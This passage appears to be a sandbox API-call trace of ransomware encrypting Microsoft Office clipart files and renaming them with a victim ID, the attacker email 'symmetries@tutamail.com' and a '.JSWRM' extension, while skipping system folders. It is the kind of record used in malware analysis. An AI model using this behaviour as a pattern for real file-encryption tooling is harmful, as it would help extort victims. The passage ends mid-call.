[0093.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0093.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02288_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.238] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30432) returned 1 [0093.238] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76e0) returned 0x24d210 [0093.239] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x76e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x76e0, lpOverlapped=0x0) returned 1 [0093.242] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.242] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x76e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x76e0, lpOverlapped=0x0) returned 1 [0093.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.243] CloseHandle (hObject=0x314) returned 1 [0093.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0093.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0093.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0093.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0093.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0093.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0093.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.243] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02288_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02288_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02288_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0093.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0093.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.244] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5850, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02293_.WMF", cAlternateFileName="")) returned 1 [0093.244] lstrcmpiW (lpString1="PE02293_.WMF", lpString2=".") returned 1 [0093.244] lstrcmpiW (lpString1="PE02293_.WMF", lpString2="..") returned 1 [0093.244] lstrcmpiW (lpString1="PE02293_.WMF", lpString2="...") returned 1 [0093.245] lstrcmpiW (lpString1="PE02293_.WMF", lpString2="windows") returned -1 [0093.245] lstrcmpiW (lpString1="PE02293_.WMF", lpString2="recovery") returned -1 [0093.245] lstrcmpiW (lpString1="PE02293_.WMF", lpString2="perflogs") returned -1 [0093.245] lstrcmpiW (lpString1="PE02293_.WMF", lpString2="documents and settings") returned 1 [0093.245] lstrcmpiW (lpString1="PE02293_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.245] lstrcmpiW (lpString1="PE02293_.WMF", lpString2="system volume information") returned -1 [0093.245] lstrcmpiW (lpString1="PE02293_.WMF", lpString2="msocache") returned 1 [0093.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0093.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02293_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02293_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02293_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0093.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0093.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02293_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02293_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02293_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0093.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0093.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0093.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02293_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.245] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22608) returned 1 [0093.246] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5850) returned 0x24d210 [0093.246] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5850, lpOverlapped=0x0) returned 1 [0093.249] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.249] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5850, lpOverlapped=0x0) returned 1 [0093.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.250] CloseHandle (hObject=0x314) returned 1 [0093.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0093.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0093.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0093.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0093.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0093.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0093.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.250] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02293_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02293_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02293_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0093.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0093.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.251] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10196468, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5328, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02296_.WMF", cAlternateFileName="")) returned 1 [0093.251] lstrcmpiW (lpString1="PE02296_.WMF", lpString2=".") returned 1 [0093.251] lstrcmpiW (lpString1="PE02296_.WMF", lpString2="..") returned 1 [0093.251] lstrcmpiW (lpString1="PE02296_.WMF", lpString2="...") returned 1 [0093.251] lstrcmpiW (lpString1="PE02296_.WMF", lpString2="windows") returned -1 [0093.251] lstrcmpiW (lpString1="PE02296_.WMF", lpString2="recovery") returned -1 [0093.251] lstrcmpiW (lpString1="PE02296_.WMF", lpString2="perflogs") returned -1 [0093.251] lstrcmpiW (lpString1="PE02296_.WMF", lpString2="documents and settings") returned 1 [0093.252] lstrcmpiW (lpString1="PE02296_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.252] lstrcmpiW (lpString1="PE02296_.WMF", lpString2="system volume information") returned -1 [0093.252] lstrcmpiW (lpString1="PE02296_.WMF", lpString2="msocache") returned 1 [0093.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0093.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02296_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02296_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02296_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0093.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02296_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02296_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02296_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0093.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0093.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.252] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21288) returned 1 [0093.252] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5320) returned 0x24d210 [0093.253] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5320, lpOverlapped=0x0) returned 1 [0093.255] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.255] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5320, lpOverlapped=0x0) returned 1 [0093.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.256] CloseHandle (hObject=0x314) returned 1 [0093.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0093.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0093.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0093.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0093.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0093.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0093.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.256] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02296_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02296_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02296_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0093.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0093.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0093.257] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10170232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10170232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10170232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE02369_.WMF", cAlternateFileName="")) returned 1 [0093.257] lstrcmpiW (lpString1="PE02369_.WMF", lpString2=".") returned 1 [0093.257] lstrcmpiW (lpString1="PE02369_.WMF", lpString2="..") returned 1 [0093.257] lstrcmpiW (lpString1="PE02369_.WMF", lpString2="...") returned 1 [0093.257] lstrcmpiW (lpString1="PE02369_.WMF", lpString2="windows") returned -1 [0093.257] lstrcmpiW (lpString1="PE02369_.WMF", lpString2="recovery") returned -1 [0093.257] lstrcmpiW (lpString1="PE02369_.WMF", lpString2="perflogs") returned -1 [0093.257] lstrcmpiW (lpString1="PE02369_.WMF", lpString2="documents and settings") returned 1 [0093.257] lstrcmpiW (lpString1="PE02369_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.257] lstrcmpiW (lpString1="PE02369_.WMF", lpString2="system volume information") returned -1 [0093.257] lstrcmpiW (lpString1="PE02369_.WMF", lpString2="msocache") returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02369_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02369_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02369_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02369_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE02369_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE02369_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0093.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0093.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0093.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe02369_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.258] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2240) returned 1 [0093.258] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8c0) returned 0x20c6c0 [0093.258] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8c0, lpOverlapped=0x0) returned 1 [0093.260] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.260] WriteFile (in: hFile=0x314, 